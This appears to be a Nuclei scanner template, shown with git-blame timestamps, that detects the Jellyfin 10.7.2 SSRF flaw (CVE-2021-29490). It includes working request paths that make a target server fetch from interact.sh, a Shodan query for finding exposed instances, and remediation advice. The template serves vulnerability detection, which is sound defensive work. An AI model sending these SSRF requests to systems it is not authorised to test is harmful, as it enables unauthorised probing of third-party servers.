2021-11-24 15:01:45 +00:00
id : CVE-2021-29490
info :
2022-10-19 10:54:26 +00:00
name : Jellyfin 10.7.2 - SSRF
2021-11-24 15:01:45 +00:00
author : alph4byt3
severity : medium
2022-10-19 10:54:26 +00:00
description : |
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
2021-11-24 15:01:45 +00:00
reference :
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
2022-10-19 10:54:26 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
2021-12-04 07:17:12 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.8
2021-12-04 07:17:12 +00:00
cve-id : CVE-2021-29490
cwe-id : CWE-918
2022-04-22 10:38:41 +00:00
remediation : Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
2022-10-19 10:54:26 +00:00
metadata :
verified : true
shodan-query : http.title:"Jellyfin"
tags : cve,cve2021,ssrf,jellyfin,oast
2021-11-24 15:01:45 +00:00
requests :
- method : GET
path :
2022-10-19 10:54:26 +00:00
- "{{BaseURL}}/Images/Remote?imageUrl=http://interact.sh/"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://interact.sh/&ProviderName=TheMovieDB"
2021-11-24 15:01:45 +00:00
2022-10-19 10:54:26 +00:00
stop-at-first-match : true
2021-11-24 15:01:45 +00:00
matchers :
- type : word
2022-10-19 10:54:26 +00:00
part : body
2021-11-24 15:01:45 +00:00
words :
2022-10-19 10:54:26 +00:00
- "<h1> Interactsh Server </h1>"
2022-02-25 22:07:55 +00:00
# Enhanced by cs on 2022/02/25